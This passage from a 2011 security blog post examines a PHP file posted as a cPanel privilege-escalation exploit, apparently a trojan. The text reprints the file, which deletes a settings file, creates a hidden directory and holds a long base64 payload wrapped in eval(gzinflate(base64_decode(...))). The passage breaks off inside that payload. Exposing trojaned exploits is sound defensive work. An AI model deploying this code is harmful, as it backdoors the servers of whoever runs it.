0entropy

Fast and simple backdoor analysis

2011-07-12T12:05:00.001+03:00

Going through my reader feeds in the morning, I saw one post that stood out today. On average there are about 500 rss feeds / day and through time you get used to clear in a glance things that matter and things that are just noise. The “interesting” post today was about “cPanel 11.x Privilege Escalation Exploit” at Inj3ct0r ( http://1337day.com/exploits/16512 ) .

Strange I thought first of all Inj3ct0r is not the first place that something like that will appear, a cPanel privilege escalation exploit, if it existed, most possibly it should had appear first on exploit-db.com and/or full-disclosure mail list. Most of the times Inj3ct0r works like an aggregator from other places collecting exploits and papers from other security related websites.

Let’s have a look then,

   1: <?php   2: # cPanel 11.x Privilege Escalation Exploit   3: # Author : ZxH-Lab's   4: # Note :  Ghamzeh-Hacker Found it By Himself too :)   5: # Site : Sec4ever.CoM | Sec-L4b.OrG | Tryag.Cc |    6: # Greet'z 2 Tw1st3r | I-Hmx | Sec4Ever | MaestRo_Dz | The Injector | Mr.Dangers |FoX HacKeR | Jago-Dz | S4S | Mr.L4iVe | Ahmadso | r1z | JxH | BackTrack | Eng.Silent.Night | ProFeSSoR | 1337Day   7: # Special Greet'z 2 FreeMAN | EvIL SheLL [R.I.P] | Dr.AnGeL | Ghamzeh-HacKeR | T0r0b0xHACKER | X-Shadow | TheMMA    8: ?>   9:    10: <html>  11: <head>  12: <title>  13: # Privilege Escalation Exploit By TurkisH-RuleZ  14: </title>  15: </head>  16: <body>  17: <pre>  18:  ______  __     __   ___   ___             __       ________    _______   ___   ______      19: /_____/\/__/\ /__/\ /__/\ /__/\           /_/\     /_______/\ /_______/\ /__/\ /_____/\     20: \:::__\/\ \::\\:.\ \\::\ \\  \ \   _______\:\ \    \::: _  \ \\::: _  \ \\::\ \\:::__\/     21:    /: /  \_\::_\:_\/ \::\/_\ .\ \ /______/\\:\ \    \::(_)  \ \\::(_)  \/_\:_\/   /: /      22:   /::/___  _\/__\_\_/\\:: ___::\ \\__::::\/ \:\ \____\:: __  \ \\::  _  \ \      /::/___    23:  /_:/____/\\ \ \ \::\ \\: \ \\::\ \          \:\/___/\\:.\ \  \ \\::(_)  \ \    /_:/____/\  24:  \_______\/ \_\/  \__\/ \__\/ \::\/           \_____\/ \__\/\__\/ \_______\/    \_______\/  25:                                                                                             26:    27: <p><font face="Tahoma" size="2" color="#FF0000">* Note : This File Must be in The Main Website Address To Build Exploit Successfully </font></p>  28: <br><br>  29: <div align="left">  30:     <table border="0" cellspacing="0" cellpadding="0" width="100">  31:         <tr>  32:             <td>  33:             <p align="center"><b><font face="Verdana" color="#FF0000">  34:             <span style="background-color: #FFFFFF">Status b0x</span></font></b><font face="Verdana"><span style="background-color: #FFFFFF">  35:             </span></font>  36:             <textarea rows="10" cols="96" name="Status b0x" style="font-family: Tahoma; color: #FF0000; border: 1px dotted #FF0000"><?php  37:    38: Error_reporting(0);  39: unlink("../fantasticodata/kanoodle_settings.php");  40: $direcotry = "../.fantasticodata";  41: $mkdir = mkdir($direcotry);  42: if($mkdir){  43: echo "[+] Making Directory's Exploit ... Done\n\n";  44: }else{  45: echo"[+] I Can't Make New Folder , I'll Continue If It Exist's !\n\n";  46: }  47: $trsm = "PD9waHAKICMgWmFJZE9vSHhIYUNrRXIgLSByMDB0QGRucy5qbwogIyBNYXZpMSB+IFR1cmtpc0gtUnVsZVogVEVBTQogZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnN2YxNWU5ckkwakFPLzUvcnluZFFkUHNlWUlJeFl2RWFlK0o5aWJkNGkrMGtEMGNnQVlvQk1SSVlrNXo4UHZ0YlZkMHR0VmFNN1p3emM3L2pjeVpBZDNWVmRYVlZkZlgrK3BVeTA5RjdyYUhlTWxjelpxK1ZXVkZtOU9HZ3Jhd3FSZmphMDd1UWpvbDkzWFhwMjN1clo5VWMweDNZanBsVlhiMXAxcnEyWWFxNWNKYmROM3UxdXU2YWh1VkVjNzJDTmF2WDZBemhjd0tZK1dBMjRtRU15OVhySGJQV0hQWWFBOHZ1dVZFUXZkT3hSN1doMDZrMWtTMFB3RFVIMll6cE9MWlQ2OWl0VFA3NDh2QXdrQWVwTmNwM00va2k1REJZeCt6YnpzRHF0YkxidFhVcVlUV3oyVGZ2QlFmQXJPVU8zR3dHOGJUTVFTYVhVLzc5YnlYN252L09abVRoWkhKdlZvbHdDQ1pXUkI1dzdzZU1qR1JWVy9tcG1CM1hEQ1VYVjM2dUtJYlp0SG9vellIdURBWlcxMVR6NzRGRTEybzROdjdNNXFBS1VOOWFWMjlaamRxZlEzdGd1alZuMktOTXJQZDd6TVZmdFk3VnRRWXN6Wk5TVjMrZzlobFM1UkdNU2N1SHNJZUQvbkJRcXcrYlRkTUJ3Ykg4R2ErS29HOHhGYzhnekwzcHVJQVdJRExGZ3BZaFdiL25pYldHM2UzcjBNTHYrKzArVDh2bThrcW1VdEFLeFV4T1dWMVZacldjOGtPWnFaMmVuRjhBa3Q5bTlpNHVUdWxYN1dyOTdCd28xSGEzcFJ6NDRXV2NiNTlkYlovNWVleTNsNzE1Y3ZKaGY5dlBacjk1OWs5Z0ZKcXpGUlpycTk4QWVRTkxUVkJOdmRGV3NwdzMzVlZtN2xiWFp1NTlmai9QM0gwRjlPN0FzZnB1UjNmYnBwdUZmRVF1bGVac2hNcXoxQlFNeUdDV1cvdXFRbEpDanQ5WUxqYVpxUHpuek9uZWFXMzk4bUt2ZGdrcG1hK2twbDJqbWdMeFpuV1ZYRWNLNU9rbkRvZU9CVW0zVGQwd25Xem0wNmRQcyt2QWt3bksxOUFINXJLeW9idFdBMVZCZ0tDczU2QjlsVXBSVXk1N1dBUGJzYjZiQmdLQjZRMnk2cnY2Mm5xallicXVzbVgyTE5ONE4xZGZVM210WnhBUHF0UHJWKy9hZzI1bkRUOGhDVDhIMXFCanJ2MlBjakYwN2l4M2IvWnMyREZ2bGZPMmVYajRibzVsQWxUWEhPaEtlekRvejVwL0RxMzdWWFhUN2cyQTRkbUxjZDlVbFFiN3Rhb096SWZCSEpKWVVScHQzUUd4cm82c25tR1AzRm10Vk5WVXdBWFl6aTl1RHJmaDY4QlJmcngrdFhGeXRyVjlObnUydjd0M3Nhd28vNlBUbjZMMUh4VFg3bGpHaWdkeWNYSUtBQUJpMGw4Y3lPSDJEaUpKQTlrNHViZzRPVnFPSmRTd083WURXVVg2ZzRTZndLWHhkK0N5TU1BdVFmTlpYVmFLL1FmRXQ3NzVZZmZzNVBKNGEzYno1UEFFMHY5bnE3SlYzRnhNUkdURVlHbENDeThyQy8yQmNtVTZodDdURTBzN01hVmp4WXI4eXFBQmFZRDdCT1Y1QXZ0V0Q5eHVYSU0xNlMrMXdaYm9MN1hCa2tHOEJvc2pGSzJFV1RHTHhxSW4yY1dKa25YTmp0bjR2MVl6WHJWaEhicllnQzdVaDRPQjNXdGJyWFlIL2hzb3BRazY0UkVkV2NhZ3ZheVVpLyticEhmZ29xQUQxZjkra3R5eEhrekRIYnRLM2U0a3VZR05rNjBickZsWGQxcFdieGtweEVIVzljWmR5N0dIUFdOVzVIbkVBTXY2Y3NmcTNTay9HQ09PYWF3b0Y5dlhGN05iMjVzblorc1greWZIeTByUDdwa0VlbSs1MXNBRUo2azhDbHlIZ1BIZWZDVHV0ZzB4anZLRDhWanZETTJWSk5oM2M2SlhlZWMyb09zZktGNlkveVh6VGIvWFdlcVhERUNJcUZWcFd4UmozbWN0SS9mNkZZaE5VUXk3TWV4Q1gxYUFNR2E3WStMWGpmRytnUkFGZHpEdW1BV0l2dnNkZlF6OTZaY01FditTV1FrVWJOajJuV1d1V3NiYkx4bUlSaW43cDBUVWJVTmsvaHlpOVk3ZHVFdWxxa1dwUW5mY2ExRmwzWUZFR2VPZkthajdkYzVoYVNWUUdXSUlJM0tXSlF1WE1VT2QveHhyaURXSWF4c1Fucm5LZDZ2ZnRMQXJVTzUxUjVreDlBRkU4ZzJvcWU0NCtqZ0xNUXlsTndZd21JRUFQNUpoMnMyYWxLbCtlYWdXdnp4VTZsOGVpbFg0Yng3K0s4ci9xYndjR0ZITmJqYkJwYkN4bnllcVljOTZLRzNaN2dXT0JXYndGd2I0Q0VSeEp2NGdEaUJGenFiOFB4UVFJbFFCUmhqS3N2ZmRnNktCRTVUeWNIek9qT0ZMNXF2eVR0R1dGa01Fdk14Vnlsd0paSFh0SHNzSkpSdjZPQzY5YlE5aFNQZVZEM1BsQWxadkNGRjZYQlkwZzkwenZLeWZpbU1PaGs1UHljWlZZSlpYNE4wN3BWU0ZrRGxZUzhZdDVtblJQTVl5WkdyemtVekJOK2JHRlBXWWgvd29WYjhDYTJzUTc5TW9RclN5YmhnN29IWlpVcmc4Ry9ubldmVzlwcWFRbnNZU09BTHU2QTB6bS9ueUpRUERyYmtNTDRJRE5vTVhNc3hHMjN3QUR0cVdPN3NXVkNOcWZRUUdDQUdmK2ZLUVVRcTgvT2Y1ci83M0Jmd2V6SzVJMmRWb2RrbktMa2V6aTFLMjloVUdEZmQ2SjV1Um1WRUoya3NBQk9vS0RVZWJZYXNxdzM4VmxlVVVLRXVyY01QeWt6eGJrNUlXZzBrZU1VaUJWcWwxekI0VE5ueGh6WUxrR3c3NkF2aTNYUElUditNWFNHNTl4L0d3QThPZWFCNUVGWUFyeXo5WWNsNHA1ajBLbEpJRHhhM0FBTHBFdEVJOGZCYzRHY045NkRXem1TdHNldUFuUGgweHhPYndHb2J6N2pNK1E2UlBjUUJGUDVHQS9GL0VJVm90cUp3eXU2Wnc3L2taVFJaZ3NFNkdROTVVYmtFTi9pdXBYbWE0eGVSVXYya253L29ON0tYS2Jld2xSdVVZbXlYRUZaY3BTVE9VSFJHb2tnQlUvTVVaeUdlNWxKVGp0WmpVRGVWV1lwUGYrZ3JaZEFMb2hES0lRcUliWk0xUFlBR2ZoLzFzbGp3YnR4R3IyKy9ZQm5nMW1TT3VRMFFKRUxKdU5SWlMwQU5RM2pVd3hBVy9aTUdIRG5UVUJibTVyTytRbDQyaXpVMExkaVUxUHVjZ0laY3NHN05rYmY0cEM4dnpMTC9Ob055b2YyQmZqV0czbjU4UitTalBWc2V1Nngyb05ac0lxWm05aG0xWXZkYUtsOVBGcWNUQnVHL3lDRUNVeHJnaFU0Y1lLS1A4OXBzU25WQ3RleDR1UTNOb0hpL1kvcGxDL1hzSko2czk3TmlyNlAxK0IyZVNBTTNjd3l6aUpoakJPWURVSmJjcGtxbDN4T2d0aHI5V01uK3Q3MVJYTTVhNzFuY2tIQllLOHZnd1N6alRXUmNnRXVlQzNPUDRUbU03VmF5VGVPUDVJblJkVlhybVNBU3kyWnlVQTJycUJScWU2b2l1eWRjcjdKWm1LOHozKzVXVnNRak12SzQvVXBpekd3TnpNQXNFVEwyYkNTbDExM1pNU0RmQWlreVFuYSs1T0ZyS2Uwc2pPRk05Y0dqNUF5ZWZJK0tqUllWTTdyZmZZckxBUmhOeUlCeDJFN0lhSGR0RkhjS1c0Q0o5VDBRWW8zbEZwWFdRVVJ2RjhPWjlreHdCUWVLNkFQQ0s3ZmFlS0lqMEZhZzJvZlVTbEo4b3U2a3JoUEpLWnpzMkQwaWl4NXBjS1dJZnMxakRFR2dlZm5JRXZLbHdkV0dLK2dDQVJOa2wvTWdDeDdZaVRhZHpDSnhOWjRoUnU3aElXUW9wVVNvdFhNZW9jVU4zR1dGUnEzQ3V4MEV5UmhTRVh3T09TQ1FHeS8rQW1OdG02dnZaVTk5Q3BvYlRQTlg1ek5jVmI5U0NlQUs5SVNMODNySHFraDBTYWxEN1J4ckdHOGFLOG9PVnczOEFEUzJCTkVZR3JzdW9EYnMveG5SbzZKL01tREFscXdyM1UwQU9sdWZtMUlMa0RYaUxLMTdsUTJicnVZR1V5bXZhRXRSZWVUL3M0VnlPVnpCSkdGM2Q2dWlEQVdnRWdOcDVpRFRzYm40R0hOVzMvQXhMSjNiWWlnU3FrN29ERU1zS0FYNXh2dlRVRlQ4WHc4R2ovYVB0MlN1MlFyV3NhSVZpSEpDOGpMQ3NnQXdZcWM4WjlHdklmZ0I2UmFIbDJTK3FCSWdwbWE4RjlZdWFpdC9SZTI3VGRHYTNlUiswck9CNjRYd0ZDOFVVYkxTSHZidWFDejUxa0dXQU5kSHZDTUpjblROZmM3bUNvQTNOaTNKa0VpVFpxV3BlNEtYMjVPTFhwTkUwamF6WlZFaDNYSFAvN0lpWmtMYnQ0dFJFcG1NMzlBNyt5UENaQzF5THhRenhlK2lhanZ3YlY1amszMWdEK2JkUmwzOUJSWG9tS1FGUEFMVVVVeXU0K0N0UzdaSHJsZWdNdXozeHF6ZnMxcVJNL05tMHpJNGhFckF6VzVIREtpSkhZYWc3c2dha2NEUmdOdXFZMWtCbU0wZmo4NCtIbVdXVUtPanRZQ3hnc09yTU1QemZXSmx5dVRpZllVdVFjY3ZTM1RISXRjWkpZNC92eTU0ajhxV0F2aVlBTDJoakV4UXl5NW1DUkRzdkJ2dlFCT0k3TGZDUk1sZ3Vyc2piUTZkaFppTjBmQzVBRytwZzNYY3JvdkxuMDFWZXE1VExhWlYzcDZ5OG0xajUvQlNWajFZNHFiNm5nTHZsbU5OVnVsb3BsNmpTM0VXcXlPRnFSaTNJREtzWkJlR2xaUHlKeWNpemxJdy9DUnJZSDltT0laZUFKTXd5Nm14emlKZUJaZ1Vaek81ajVONXZUU0YwSHppTEZYcVcvcHc0ZWdNNnorVUV2dXlHMWJGYmR1OFJYQW5Rck56U2lpUVk3d2NLNDRsTUJ6MmhQMDlPQzE0MW8vNTRWOEh0MWk4cE1aZC9tZ0Z5YTNnMnlvQ09UMnEzeDRyb3o2SHBnS0hRaDJRaUlQNVYvcFU4T0lVcmp4SmdVNGVvWW5WMU5TdGg0a0psdERKenYyY0tqYmFUTGVZS21kL253QjFRZXB3a0pJYUlDOSt2MHM4WTNWZ0oxSktQNmVMMENYNG45YWFsNUthTXI1enJWMjZxdW1RK0lqRGJINVdKNTV3akZ4Mmt6TDJ5eHFhWUgxR0RzSGVNclFhNEQxNkhNUE41cmg2eDdRSEZJUEFZVE5raVdPeVpsWkpkVkd5RndQUDBjUVBKZEJYaWpVSWx2YWJ4aHN6SU91QmxHN2NpeXNSem9WSU5lOWdiQkNyMmhsWUUvTHJJTlp6eHBJbTRTWkM1bFFCanF3emtjNllMQVQ5RTZCalkvcHhnMmpoaUF0TEREb3VVQkRNZzhWVnYrY3NURFlWamtYVFJSS3ZTYnhhWnJSWWY0dy9DYUxqMXhyVjhnQ2FuSVlHemxHQUJOcFNudGdmeDRsS2FYMFdhditUbG16Q1dhdGVncTdFYmdSYkQ4VENIY0V4VHlDcEF3ZzlDQk0rNUgwR1pJUmtTVyszT0hMc0JGb3BmYzFJNy80ejNLbEVSSlZwOHZJamNaNHJJblNnaTl6OG1valMvRlJGVWdndUpsUktIZlpxSW9IQ2FmREQ3UDY4L252dUxxUzE0RWZnSkJLYXVLcFJNcm11NENkNitYYUVTV0h0M29BOW8zZi9YMXovQjNlRWdFWXJqbmpEdWk4VWdnSkppQWxVc0VYRjVtSWhybmRBVC9NLy96RDd1THhNc3JmSFNDdjF0akVNN0l5KzIxNCtVVUpHU1YyUVRLamt3aldVbFU4Q0ZmeVdyR25QZHVSdGxiOWxhcGwzYWNyR3lLTGFsUXkxQkw3Q1lGRjRHb1NzU1h4Y29GQWFOMzRLQVZRSDR5UG9yandvTzR3U3NVQ2ExWFViV2x0aFFVVG5mTy9ta2JKNXRyMTlzS3hmckc0ZmJ5cjlFQlFxWmYrRTJiMDF1WmphOVJ2amt2akJCRTlpS1YwRDlQbWRZYXpCcDBXUlNDSDVLSVUyczRQYmg5dWFGOHJ1eWMzWnk5T3pLTlRFZ3M2Q25uckhlaGF3UWt0NitsVFpVQit4dXh2b2EyQmdkeXVQYm8zblhDY1VoSEhjYmV0K3M0WTdwWG92MlN2K01pbXIvK0h6NzdFTFpQNzQ0Q1ZSTnljS3Y5MkoxVVAxWFh2bVhtZzlGSmlDZWYrV1VxL1hEeSsxekpmc2xJeGZBelJSK0FjRWxsUGlTeWExa3BEZ3B0dU1OcWVONW1qb0dtMGRVNGEvWE1ycGh5UHZXSjdTRjN4UktWcFpyWG9scmhoZHFoYml1UGRnVVBzUS83ZkhyMnlNY1RnVGI0dVJzZlJPOExXK0hPQ2M0N0JtbWd6T3o0QU9HMUNGbnZHRE9NSnM2aUh4WkVuaTRLOWNDWFRsYm8zcmNuSTJZYUdYTFdqSER6MWpqRnpPVWp5c1ZVRmFhWjN0Y09VK29GRmROTEJSWVp0V2JUY2czRFJiZlBrNFdYSmhjSkVFTWdiQXNWaVplYVhlYTBuR3pVaWlpeDVZUHoxZ2xEYUFmcFUzOGdNNGJIdm14ODBDWlJ0ZkFJemkvL2FZRVVsWlhWY01lOVRxMmJ0Unc0VXhGaUZCUm84WldoOFR3bmxiWVZzVVNiQWdvajR1eHVSK0JCWGh2U1JaWFpLVUYyUWgrZVcyV0w4MUtleEtJckwvYUdNZGRZTmxmTExueWFRdlRjYkphUGxKc0pTUVFWZVZMQU9JNGt5dy9wUEhlcm9NYW0zb3ZLL1laOFAyTjd6SGF4TzlSM21LMmI2ejZPdzlvWWpHNGxZUXRvL3E3WkFRWFlyZkZWNzRGVmpSVkdIdE9QaG9sbHUvOFZUdmFwQmdwZ3hYblpid2x2NEZZVXZTNDlROVVlVUM0c2RsMnJRR3RVYktWUFJ3R3JTaWlLbXl4VWZ6Q1pjWVZET1BadXF1b0pUK0Q1Wjh4RXkyd3V3MVY3N2Y3VnE5cDgwYWdrdTk1V2xhZ1V0L1ZuYlYzaG5XdjZCMnIxVnR0QUJNbXBPREdmNldwTjh4VmZvU0NOa0d0enBiVzN0WFhQaXZ2ZEtYdG1NMVZZREZ3NEF5NjFoMWNGRjNEUXdYdjV2UTE1U3VlQjNzM2gvamdBd2l0Z2JZWUZ0OVNJamZJWkxPcnM2bEcxYXNPclhEaXl2aWZIYjRWaGkxa2twN0JKL283MUd1aFhIVUt4aW1EcjNINldUWFhkTzVOeDRmZzZ6MFNCS2I0K1h6eFUrUXo3OW1SeXJQRjBHQiszOC9uaTZQQmZNNGkxWk1HdWVZRDMvNjJrc2xMckJBQTZUUUpJdk91Ymh0anBkNmlBd3VyL0V6Rm10Z3NRUFM4OWMrY2FQb3BtbDFoaUIzVFFBWFkxSHVaZ1ZoUVZRYTJndUVXazE5Y2MvdXpvS0t0UFFIa2Z2dU5zeWV0dXJ3VWcvemtrc0ZIdVNtc2VWRWFGenhHWnhES1FYem1MWEVBOTJJTEgwdGJxM3A2cUU3a0MvbzZzNGVjMFR6eC80RGRBUHFDcXFDandHT0xidDlzV0hxSHppNks1WUR0NDR2YXg4dVRpKzN6WEVHVm1RZVRWZjJoTTBrdnNDRGpkL0ZGNkNFNWgrellHNTFTV3RXS3hmOWRlemNBZVE2TU5GdmZwZ25tWlFYNEJvNkpFRTBvQjltWlF5UnppRzJPaUNCemdjNWFZOVB0REVFd21QNlJ5SjY2NHJjSzExODI4eU5Gem9FTUhqWkhwWGt2U3hLTUMyZU02QlMwQ0hwLzY5WGQva3FrU2dQRE42Z0cvVTN3aXd3UGhzOHlYNzZyWlFKL0d0SUNzVjFJNGhYRnI0WkdKTVJFOG9DRXN1UEdJOEdjUjR2MVh1OE16WGpCQm9TYVZsOGh3U0FMdnBlYnJMSU1Bd3lHR0R1RlRBd1BLQ3kyUE1QYXhWZmIwUENtaENNYm5idzhNUlNLcnYvSXhpYm5sck5nZUZLelA4SHlCRW9GVVhvV3FFK3lQTzRhQXBIdFQ3K2lkZktnVHBkdFo2SnZYWFBRdG8xVjdGaklIeUtnMWN0bTJwWmhtTDFNSGp2TmZERXZkNkc1ZUREUmdRYWd2VjQxcVJEMXFjRWlySnVOTFNBNldhbUExKyttRk9oSEMvUlRDd1FyN1hmTnNVVXdQZ0ZvdjF2Mm16N1NnYWtyRTNzTU5Qb05tcFNscG1ibmlpbm94ZDExck9rRVJ3cHBPWXNWdlQ0Vmc4VlFYeUUwVVJ4QnhVbisxZmtxYVJmb0pFTXErQWROQ3dkbFVzVHhSMXppY2xhbFdkYXQ5WXYxamZYejdmT1ZMNzNnTkF0R1N4REJVazhtMkNEdTVBcnk4N2pFRGY4dUtxaWNEWHNVWmhCSmhXcUlmVGloQ0ZSeUR2VmErdjFmRG5DRE1ia0JJY2xBakwzRUZzbGFiV2YvY0x0V2l5MHg2UFpENE9vY3BNM1ZqWDZIYmxjSnB1cU51NWhVSXk2dDBJaW1HdjI0dEZqQVJsejV2dk1ReHhhRVAvM0M0R0dneGxhUkJpV1dQRTdoZ2IwM3JYRlpJejNJTXE4dTdzOWd2MmpEZmNhYmw4dThzOVo2TnRPYmQzTVdpNEh4c2hlM1ZyZnRqa0Rod1hNa2Z5aVppN1BMN1F6NDJzek8rdUg1TmkvbjBZRHh4YkRUOGNuZzFUQVNicnYramJaUUNleWluSktscFNLUjRCZGdLMGdlUEJzbDA3VXhxRGw5eDRKeHBpUHlWM3g4Q0JiWTFZekNoalN6Wi9pRGJHK0c3TEtHbThwR2p0N1BadGs4dStBa2VDaFJncU5kWVA0TzRQZGV4dnRvRElDZ2VRVTZ0VHpJZlZSM2xMbTFURjRaT0lUZW05Wnh6SlovalBGTjlyZlAvMi9sNis4NURwK2xYeXU1TnpqMU9LUE5sSHc4ZkQ4YXY5NGw2Y3FmbXQ3cDhMTVVZak9xaUJiQ0hTK1NtRDRLazRjV1VVZFNYOXV5SEpQT2xqTlBRRjdweVhIa0pHS0h1Q2RYdVdMYS9ldkpIZWt1ZkV1bHg2TXBiMXYvZTZsZHNqa1dXSnBqREMyRjdjN1FEbjh2bXNzVUlHb3E1d3FaZEtlY29SQVlvS0p4ZXFvN2o2dFdwaEQwS0ovWlhtZVdsc0g1N2tUaHZnQXR0c04vTXJGZ25EcmplSXJOb3owNWh2MUw5WEtOL2pER215ZFpaYUpGUG4zNGYzb1o0VGNtV0k3NkI1eDE3QStiNHZoSVZvVmZPRittOGswSm1Fa2FqQWRiMzR0emdaUWFHbncxdkFIWERDS1FwM0xVWlJqZ1lCayt0a0hFQ1BOWncxa3VOY2VMNEU5MWRuYVdoaVZQTlJsdytWMk92ZWhyMm5NVldzS3FUYVcvL3RSeVlEem5WMmRLRmNaVmRDV2xxWDNxc3RIOEZVMm1hM2IvcXlaenRIMTBjbmJ6WktzQjlpV3JnVit5MVdDbVp6WENhQ2h4b3RFRWJBYUwvR016LzlpTU41anFtbTRydTVoamhoTllMc0JBME10ZWlSYkZ6V2NKeFNncnBzaDlGM2VySlJUaW1USEZJR0p1V0FtbFdGNXNJY084VHl5RWVUR0YrZzd1NEJNTFBzSFZrMHhESHloekNESEh1N1RZS3JKVGN4TVFDS2dZQkJicWd6UHNEOXdKT0NUQUdEUzRPOGh5VFMxQkFvVEdIRFRtZnVlQWNUaHc0c2xxSkRVeXp3VmJ3SFlidXJNNGlJaXJVQlBHV1UycmxZREd5NDRwT2tvb000b0Zic2MxRzRHM1k1c0tSR2QxazJySE0rTVVDK0w1SkwyQ0xHVzJCNk81V09WeTllRkRRc20rcTh4aWJreXhuamxJc1JxZUM2WGpqVUFmREp4RUs4Qk1aZlkrdHFnN2R2R1cyVGdkTkExclFBdjNtUldSWS9KRlo4Ukxlc1dLRjdCdFk1MEhNRjEvTW5KV09nNnRZYmwzU1U0Sjg1VFpXQjAxbWtrT3NLbk10bFBzcS9Ua09nQzJvVm1BNW92RGprdXI4ZmIvR05Tc2RDelRydDJKYzRxUHc4dUtKN1lwTlBtQVJTMUpIc01IaUN2ZTFnMDd6dUlmcVhDc2VKemQ0YmxBNDhtSWVYSGNQSWJIdFBtK1pTWGpETmxaN1l5eXVwYjV3LzlUK0NmT2xIQ1lVZ2hHOFQ1aWdNdEI0QmlJaWd5aGVKQXlTRFdBSkVKUGdweVBJU2RsTDBqWlV2SmlESDZlamRjL2hvUWk1WlJpY3hEbFVneEt4YStld243TzFhM2VYRjEzMjFKSmNMY2hlY2labXArcFJPV0pQQVVrTGhjdFlWR2NENTRWaDBHbHpESm03cC9PUmtwVkJFR0pSQ1d4MmxvMUU5ZFNVclBHYUlBMm53a3FYU0J6SVpQV290cGlldllTWm0vam9NRUNMeUlwY1RHRlpzbVhzaExLSVNIaUJvSysxVGZsakhJcUg2VktlblkxUFR0SlFOZ1kxY1RHS0MzS3lxTDRkM3RMSUV0QmZRb2puMDlRcG5JeDJzNVNzWVdrWXA1Z1k2MjNYQXJXVTRGQlFWZ1c1WEtNaHNuZkEwbnloZXhLSUZ0cFhKNGRLbG1rOEc1VnFSUXFoVkplcVJhMFFpVW5WV1F4VWJqbHlqUjgrTGV0QjVuZzE4dkxlT01zYUZxOHZzT2hoVUVadmFkS1NpSE9YZnZXSnFkS2lpUW5MNFY4QTduem90VEVQaS9CeGtiUitoNVNMcTJGREVFSkU2MlV3cmJ3Und4UU9RSWs2eEU1OWFBRGtITzBTR0VaZFNXSnZ0UXdiNEp0SlhucU56S3FhbGhVQVVJQm8xZThqWG95eUVLc3JpQnNBUmZRSk1qRmVLMksybUJsS1E3U2QrRnl0eHp5b1FFL0w4TnBDWEF5VENuZ2NtTUF5Z0ZuRnNtdUJNckhVS0dtTGNXcGQ3VWFSUjNJbnc4NHlUaEp5QTB4Sjh0Ty9BakJpK2FRMCtLc2FUNGtZcmt1NVJpYWNsRXRwRjF5WHRqUnhoUXZweFN2VEM0dXV6RTVmVDRoblNTNDJiWkh2Ym5OZHN2cHc3L2cxMlNJeFlTU0FZWFY1R2d2SUx5U25JT3lVWVBNZTErVzhRNmRXZExDemIyVFQ4ZktyS1NSc3ZmMU5GVzUzTjlTc2l3dHAvakZCZGptM3U3WmFRU05zanVwMU5ISkZpc1ZFMEZHbVBsRDRJSnZ4WVdGaFp3cTFYZVNkUzJrVzlkQ0pkMUNGcWkxZjQvNHdjQVAvNnRjY2o3UmJ2M0tlcDlOcXllcnhHSXhha2FMV293WkxaYVNsWGt4MUZmUXBwSW9vNHNrQWo5UHpucVJMbHNXQURzL0ZzUEVmSnpoUlp3enVZZEt2TGtzTHNUYWJqQkdidzc2c3pGRkpRdGNEdWN0U1JMRzhqSGNMeFhEYlIzTWp2UzdTaUJidENFclc1Q3pxQWwzTGs3bHRBcFBtNDBqRmZENDhwOE14SVVkMXNKWVZ4QW9HRE5rNFZKVFpERFpvY25JZ2xBa1dIbnNMZzhWWThKd3VZdEtNbmV0R0pWMWx2YXZ6NjRwdUJrM0Z3Q083VFcxWWx3a0hnQ0lDWkdWc0J3REJhb3h0cXNWZVRzRTBoWkNrS1R5d1ZGVUFINHhySHFCM0VBWEVoaHV4L2UvTEUvakhvRnJtTEljcVpCV2VoblBJUDFTdXJpSHNtZlU4SDQzYWZ4U25JVVJEQnZEUEFSYVQ1dHF3T1R4a0kvMGkwRlhGZVFPUmpKZHZWL3JXTzdBNHdrSFU2VWdLMDhiTThXdzhvZXZUN0dNME9tSEZFYWU1ckh6c1pESzUvQVZpbC9qeHBVaER1SThlUUNBYVhnZ2FWSHlzZUl2QUxDVTRMSGlDSlRpZk1jME1uaFVZL2hQd1FWa1VtRXltYzhwOWJGeWZINFJZRXliaGpGNWhEK3R6dEw1TzhiWFBYSlZWTHBtMTNiR1NzZlU3MkpabThxZW44TWFiZ21TRkxnVU11clNrMmRCQkNQSzd3VzhrRm44OG5XWXJta09LREdTMTRMa3B6TGtWRGxBMWIxWEFEL0R3RFZFV1VOVklTc0tNaUFaY0NCOS9xVVlpOFJGbjNHRDUyeDlQRENEa2lrR0dZc2ZrajlSTXVLbTJSakJRSk13d1ZTQzlHTjh4QmYrbVIzWXcwWTdDQjQ3Mm4rYXZKZzVmWGFkdmo1bys5emVSNFVVTjNzNEhWWFFYbGw1NGZzRWpTMi9wRk9SSy8xSDRFOXh4MTNhNXB4TDQrVS81a1VleFEyNWtrQkt4THBqWXFaeXdnQmZLeWVaWUJ5U2hhVEFxNXd3MnRmOFNjZlphQ2FiZk55eXp3T0p3VmozVFZCMGlvL0pHMU9BUTVJMDlJMGlnY3FDVm54d0xRMDhBbDJLZ1pZS1NKRGxkRWpCVFhTOEJXVURZL1pBTThURFZ5ZlFVaDZCWTM0U3YwcTR4RUlzbDVodjlscXNBV21pZUp2ZGxXZmdLZSt1enFZQkJFUkpoaEFBQ3QzY3lVNGcrYUJzZFF6UGpzVGdZZXRhbjJ6blRqRm9EemZFQW5JK1cycTU3T05aZjRYZFZSNUxoSzJhc0ozWnRCNHI1Ykdsa2ZXT0JSYnR5aGxzcWVHY0hWSFZNVi9rK211UXZJcHlSa25pU1ViSHB0YzNMQkFFSFZ3ZTJNSFZSays2cE9tbmRPcEtTaVdGUHVWMzBPS21QRVduUnoxbDBtV1BSS0JvN0Rxamw4c1hHZ05wbFRBTC9pTGpaZ3dLVXRSQUsrRFYzOUJaZG0xby9taHpzRmo3a3pVSVZwdzA3NHdWQ3JjU0M3WGpXekM2cHVqcEljbnkwZzJBczNDV25UbzhOa2QwbUNtUUgxbFM5SExLUGhQOVVBT3hDSXh6VDFkeXk1bFZLVE5TY2o3RXBMK0lDR1lSZ0NRaGtEbFl2ZUR5b1FkQ3NsamYzTncrUDFlMnRvLzN0N2RrdE13UU51bkZ0NEFWa3FBMjlVRkF1UDdLNFhuYkhnWGdTWWI0ZUlYU3M2RVF2aGNZeUNjWmJ0K0RvTENmYTRTNFpGM2NCWXhESUthblkvaUJkY0VSYUFaYkR2VGVzVTVjRnhSOE1tdEZsQUZDbFRBaGYweFBWUGg2bjBjb1VMZzZvYkNuOE5nYzNzS2VWNXphVmR6Z3BoVDRiV015eEFMVHA1WVZwTHNvMjNvZ1owbEdHZkNVcktQRmEwTEVhWHBsSU5QelYvZ1FLRkNVVFp2bzl5WmRCSVIxQ1ZzWVcrUGJOaXltSHdFYlkwdDdwQXJvbFhEUFM4QlBGZ1gyUUtFSzA3ZmVsOHl